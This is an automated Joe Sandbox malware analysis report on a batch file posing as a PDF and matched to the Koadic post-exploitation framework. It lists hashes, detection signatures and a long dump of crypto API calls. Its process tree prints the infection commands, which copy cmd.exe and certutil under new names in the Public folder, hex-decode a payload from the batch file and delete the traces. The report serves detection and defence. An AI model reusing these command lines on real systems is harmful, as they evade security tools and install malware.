Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1x40 CONTAINER.PDF-.bat

Overview

General Information

Sample name:1x40 CONTAINER.PDF-.bat
Analysis ID:1569105
MD5:91f00c06e8cc61fe9239eefdb0dd0c03
SHA1:d37a062f52f67920062bc5c6bf67a846ac431e9e
SHA256:c155d1fac78a328deb5fc50e3a779cb1210abdbb22fea06dfcdeea93e5d1fa7e
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Drops PE files to the user root directory
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7508 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7532 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7544 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7568 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7584 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7616 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7632 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7664 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7688 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1x40 CONTAINER.PDF-.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x59:$s2: :~57,1%%
  • 0x64:$s2: :~50,1%%
  • 0x6f:$s2: :~44,1%%
  • 0x7a:$s2: :~39,1%%
  • 0x85:$s2: :~4,1%
  • 0x96:$s2: :~46,1%%
  • 0xa1:$s2: :~15,1%%
  • 0xac:$s2: :~49,1%%
  • 0xb7:$s2: :~0,1%%
  • 0xc1:$s2: :~37,1%%
  • 0xcc:$s2: :~42,1%%
  • 0xd7:$s2: :~23,1%%
  • 0xe2:$s2: :~40,1%%
  • 0xed:$s2: :~19,1%%
  • 0xf8:$s2: :~60,1%%
  • 0x103:$s2: :~4,1%%
  • 0x10d:$s2: :~47,1%%
  • 0x118:$s2: :~56,1%%
  • 0x123:$s2: :~35,1%%
  • 0x12e:$s2: :~39,1%%

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7532, ProcessName: alpha.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7532, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7544, ProcessName: extrac32.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF6AA1F2C2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF6AA1F2F38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2EEB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF6AA2EEB38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2ACBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF6AA2ACBB4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF6AA20CB98
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B0B9C CryptHashData,GetLastError,#357,7_2_00007FF6AA2B0B9C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF6AA280B80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B0BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF6AA2B0BF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA282BC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6C30 NCryptOpenStorageProvider,#360,7_2_00007FF6AA2B6C30
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF6AA21CC24
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B8C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF6AA2B8C58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF6AA280C3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E6C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF6AA1E6C4C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF6AA28ACAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA274CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA274CA0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6C88 NCryptEnumAlgorithms,#360,7_2_00007FF6AA2B6C88
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF6AA2C4C80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF6AA282C80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF6AA2D8CF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6CE0 NCryptEnumStorageProviders,#360,7_2_00007FF6AA2B6CE0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA244CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF6AA244CC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6D2C NCryptFreeBuffer,#360,7_2_00007FF6AA2B6D2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA242D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6AA242D18
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF6AA280D14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF6AA282CFC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA272CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF6AA272CF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF6AA20C960
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA288940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA288940
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA28C940
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF6AA28099C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2429A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6AA2429A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B2994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF6AA2B2994
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BA9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6AA2BA9F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF6AA24E9F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA264A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF6AA264A34
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA284A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF6AA284A1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF6AA280A18
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF6AA26AA00
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA288AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA288AA0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF6AA1F6A84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF6AA26EA7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B2A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF6AA2B2A78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF6AA282AE4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF6AA280ABC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA278AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF6AA278AFC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA222B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF6AA222B00
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA2AEF74
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA270F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF6AA270F58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA264F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF6AA264F50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280FB4 NCryptOpenKey,#205,#359,#357,#357,7_2_00007FF6AA280FB4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6FAC BCryptOpenAlgorithmProvider,#360,7_2_00007FF6AA2B6FAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA214F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,7_2_00007FF6AA214F90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA279028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,7_2_00007FF6AA279028
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,7_2_00007FF6AA1F7034
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA28301C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF6AA1F302F
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA287020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA287020
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B700C BCryptEnumAlgorithms,#360,7_2_00007FF6AA2B700C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA281058 NCryptOpenStorageProvider,#205,#359,#357,7_2_00007FF6AA281058
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B705C BCryptGetProperty,#360,7_2_00007FF6AA2B705C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA28B0A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,7_2_00007FF6AA24B098
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,7_2_00007FF6AA22107C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2810D8 NCryptSetProperty,#205,#359,#357,#359,#357,7_2_00007FF6AA2810D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2830D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6AA2830D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B70C8 BCryptSetProperty,#360,7_2_00007FF6AA2B70C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA239134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,7_2_00007FF6AA239134
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B7124 BCryptGenerateKeyPair,#360,7_2_00007FF6AA2B7124
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF6AA2A511C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B2DAC #357,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF6AA2B2DAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6AA282D78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6D78 NCryptOpenKey,#360,7_2_00007FF6AA2B6D78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280D84 NCryptFreeObject,#205,#357,7_2_00007FF6AA280D84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6DE0 NCryptCreatePersistedKey,#360,7_2_00007FF6AA2B6DE0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA264DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF6AA264DDC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,7_2_00007FF6AA2A8DD0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280DD4 NCryptGetProperty,#205,#359,#357,#359,#357,7_2_00007FF6AA280DD4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D0DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,7_2_00007FF6AA2D0DB8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA210E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA210E24
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,7_2_00007FF6AA282E6C
